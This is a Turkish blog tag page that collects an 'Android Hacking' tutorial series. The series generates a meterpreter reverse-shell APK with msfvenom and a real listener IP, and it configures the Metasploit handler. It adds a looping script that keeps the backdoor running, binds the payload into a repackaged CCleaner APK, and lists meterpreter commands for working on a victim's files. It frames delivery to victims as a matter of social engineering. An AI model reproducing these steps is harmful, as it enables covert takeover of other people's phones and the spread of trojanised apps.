Mobile Hacking etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
Mobile Hacking etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

22 Mayıs 2017 Pazartesi

Android Hacking Serisi - 4 (APK Birleştirme)


Yüklüyoruz Evet de , Nedir Bu APK ?

APK 'nın kelime anlamı Android Application Package yani Android Uygulama Paketi ' dir. Temelinde uygulamayı kullanabilmek için kullanmamız gereken tüm bileşenleri içeren ve tek tıkla rahatlıkla kurabiliceğimiz paketler bütünüdür. Ziplenmiş bir dosya gibi düşünebiliriz. Windows'ta ki .exe formatının android karşılığıdır.

Bilinmeyen kaynaklardan indirdiğiniz .apk uzantılı dosyaların ne kadar tehlikeli olabiliceğinden bahsedicez bugün ..

Zararlı APK ' yı Nasıl Zararsız APK ile Birleştiririz ?

Uzak sunucumuza veya localimize git yardımıyla dosyayı çekiyoruz.

git clone https://github.com/suraj-root/spade.git



git kurulu değil ise  " apt-get install git "



Makalemi yazarken kullanıcağım APK ' nın linki :
http://www.mediafire.com/file/ob48cm4csq76cfq/com.piriform.ccleaner.apk


./spade.py com.piriform.ccleaner.apk

    bu komuttan sonra gerekli kurulumlar gerçekleşiyor.


    Sonrasında oluşan .apk uzantılı dosyayı kurarken hangi dosyanın APK'sı ile bind ettiyseniz kurulum da sanki onu kuruyormuşsun gibi kuruyor fakat Reverse Shell ' i sıkıntısız veriyor. Zaten önce ki makale serilerimiz de nasıl exploit edilebiliceğinden bahsetmiştik ..
    Devamı

    14 Mayıs 2017 Pazar

    Android Hacking Serisi - 3 (Kalıcı Backdoor)


    En son meterpreter ekranındayken kullanabileceğimiz ufak komutlardan bahsetmiştik.Bugün ise Android sisteme zararlı apk(backdoor)'yı gömdükten sonra bu apk'yı nasıl kalıcı hale getirebiliriz ve neler yapabiliriz bunlardan bahsediyor olacağım.

    Sistemde bizim Apk mızı kalıcı hale getiricek bir shell script dosyası hazırlayalım. Dosyamızın adını zararli.sh olarak belirledim.













    İçine şu kodları yazalım..

    #!/bin/bash
    while true
    do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
    sleep 20
    done

    " #!/bin/bash " diyerek kabukta çalışacağını belirttik.
    sleep modunu, komut dosyasının uyku modunda olmasını istediğiniz saniye süresince ayarlayabilirsiniz.



    Yazdıktan sonra kaydedelim.


    " chmod +x " ile çalıştırma yetkisini verelim..

    Shell Script dosyasını etc/init.d/ klasörünün içine atıp çalıştırırsanız , Cihaz reboot edilse bile sistemde kalıcı hale gelirsiniz.
    Bunu yapmak için Meterpreter oturumunda iken , aşağıdaki komutları uygulayabilirsiniz.


    • cd /
    • ls
    • cd etc
    • ls
    • cd init.d
    • ls
    • upload /root/android/zararli.sh

    Operation failed hatası vericektir. Bunun nedeni ise cihazın rootlanmamış olmasıdır.

    Android telefona reboot atılana kadar sistemin içerisinde kalıcı olmak istiyor isek şu komutları kullanabiliriz.


    • cd /
    • cd /sdcard/Download
    • ls
    • upload /root/android/zararli.sh

    Belirttiğiniz yere dosyayı upload ettikten sonra , shell komutu ile sisteme giriyoruz.


    • cd /
    • cd /sdcard/Download
    • ls

    Şimdi ise icraat zamanı ..

    • sh zararli.sh


    ctrl + C yaparak çıkıyoruz . ( " Komut hala arka planda çalışmaya devam ediyor endişe etmeyin :) " )

    Dilerseniz exploit veya run komutu ile test edebilirsiniz .

    " Android sistemler için kalıcı bir backdoor başarıyla oluşturuldu ! "

    Dahası için takipte kalın .. 
    Devamı

    7 Mayıs 2017 Pazar

    Android Hacking Serisi - 2 (Meterpreter Komutları Ek Bilgi)


    Merhaba arkadaşlar geçen haftadan hatırlayacağınız üzere hedef android'e sızıp meterpreter ekranına düşmüştük..
    Bu makalemizin amacı bir sonra ki makalemiz de kullanılacak olan bazı komutların aslında ne işe yaradığını öğrenmektir. Dilerseniz kısa cümleler ile meterpreter komutlarından bahsedelim.

    Temel Komutlar

    • ? - Yardım menüsü
    • background - Geçerli oturumu arka plana taşır
    • bgkill - Bir arka plan meterpreter betiğini öldürür
    • bglist - Çalışan tüm arka plan komut dosyalarının listesini sağlar
    • bgrun - Bir betiği arka plan ipliği olarak çalıştırır
    • channel - Etkin kanalları görüntüler
    • close - Bir kanalı kapatır
    • exit - Bir meterpreter oturumunu sonlandırır
    • help - Yardım menüsü
    • interact - Bir kanalla etkileşim kurar
    • irb - Ruby komut dosyası moduna girme
    • migrate - Etkin işlemi belirlenmiş bir PID'e taşır
    • quit - Bir meterpreter oturumunu sonlandırır
    • read - Bir kanala ait verileri okur
    • run - Bundan sonra belirlenen meterpreter komut dosyasını çalıştırır
    • use - Meterpreter uzantılarını yükler
    • write - Meterpreter uzantısını yükler

    Dosya Sistemi Komutları

    • cat - Dosyanın içeriğini stdout'a ve çıkışa okur
    • cd -  Kurban üzerinde ki dizini değiştir
    • del - Kurban üzerinde ki bir dosyayı silmek istersek ..
    • download - Mağdur sistemden rahatsız edici sisteme bir dosya indirmek için kullanılır.
    • edit - Vim ile birlikte dosyayı düzenler
    • getlwd - Yerel dizini yazdırır
    • getwd - Çalışma dizini yazdır
    • lcd -Yerel dizini değiştir
    • lpwd - Yerel dizini yazdır
    • ls - Mevcut dizindeki dosyaları listeleme
    • mkdir - Kurban sistem de dizinini yarat
    • pwd - Yazdırma çalışma dizini
    • rm - Bir dosyayı sil
    • rmdir - Kurban sistemindeki dizini kaldır
    • upload - Hücre sisteminden kurbana bir dosya yükle
    Arkadaşlar komutlar bu şekilde devam ediyor meterpreter açık iken " ? " basarsanız kullanabileceğiniz komutları size dökecektir bu hafta 2 makale birden çıkaracağım için sizleri pek yormak istemiyorum. Bu hafta ki makalemizde peki neler yer alıcak sorusuna cevap vericek olursak backdoor'umuzu kalıcı hale nasıl getirebiliriz ve hacklenmiş cihazımızda komutların aktif olarak kullanımı şeklinde olacaktır.
    Devamı

    2 Mayıs 2017 Salı

    Android Hacking Serisi - 1

    Bu makalemizi yazarken kullandığımız telefon Android 4.4.2 KitKat işletim sistemine sahiptir.
    Kullandığımız uzak sunucu DigitalOcean'dan alınmış, tüm portları açık olmakla birlikte dağıtım olarak Parrot Cloud OS tercih ettik.

    Özelliklerimizi belirttiğimize göre Android Hacking sersinin ilk makalesini yazmaya başlayabiliriz.
    Bunun için çeşitli araçlar kullanılabilir fakat biz ilk adım olarak msfvenom üzerinden başlayalım.

    msfvenom -p android/meterpreter/reverse_tcp LHOST=139.59.131.130 LPORT=4444 R >/root/FILENAME.apk

    • -p  Payload belirleme
    • LHOST  Makinemizin IP adresi veya DDNS
    • LPORT  Dinlemek istediğiniz portu belirleme
    • R  Raw formatı belirleme
    • /root/FILENAME.apk  Oluşturulan zararlı uygulamanın kaydedileceği yolu belirleme


    Aşağıda gördüğünüz gibi apk dosyamız oluştu.


    Oluşturulan bu apk'yı bir şekilde karşı tarafa yükletmek bizim "Sosyal Mühendislik" becerilerinize kalmıştır. İlerleyen serilerimizde sosyal mühendislik taktiklerinden de bahsediyor olacağız.

    Şimdi ise msfconsole yazarak Metasploit Framework'ü başlatıyoruz


    use exploit/multi/handler komutu ile multi/handler modülünü aktif ediyoruz.


    set payload android/meterpreter/reverse_tcp komutu ile payloadımızı belirtiyoruz.


    show options diyerek girmemizi istediği alanları görelim.


    set LHOST parametresi ile uzak sunucumuzun IP adresini belirtiyoruz.
    Portumuzu oluştururken 4444 olarak belirlemiştik. LPORT parametresinde farklı bir port belirttiyseniz set LPORT diyerek önceden belirtmiş olduğunuz portu payloadınıza ekleyebilirsiniz.


    exploit diyerek dinlemeyi aktif hale getirelim...


    Şu anda belirtmiş olduğumuz IP ve PORT üzerinden dinliyor ve kurban apk programını çalıştırdığında Meterpreter Session'a düşecektir, böylece biz de onun Android sistemine sızmış olacağız.


    Evet, görüldüğü üzere Meterpreter Session'ı başarıyla aldık. 


    sysinfo komutu ile systeme ait bazi bilgileri listeledik.

    İlerleyen makalelerimiz de bu Session üzerinden neler yapılabilir , Antivirüs programları nasıl bypass edilir, kalıcı hale nasıl getirebiliriz gibi konulara değineceğiz.
    Devamı

    13 Nisan 2017 Perşembe

    iOS 10.3 ile Safari Popup Fidye Yazılım Açığı Kapatıldı


    Eğer bir iPhone ya da iPad kullanıyorsanız muhtemelen Safari’de sonsuz döngüye giren bir popup pencere ve bu popup pencerenin kaldırılması için belli bir ücret ödemeniz gerektiğine dair bir de ibare görmüşsünüzdür. Siz de bu vaka ile karşılaşanlardansanız, uyarı mesajını bir kenara bırakın ve talep edilen ücreti sakın ödemeyin.
    Devamı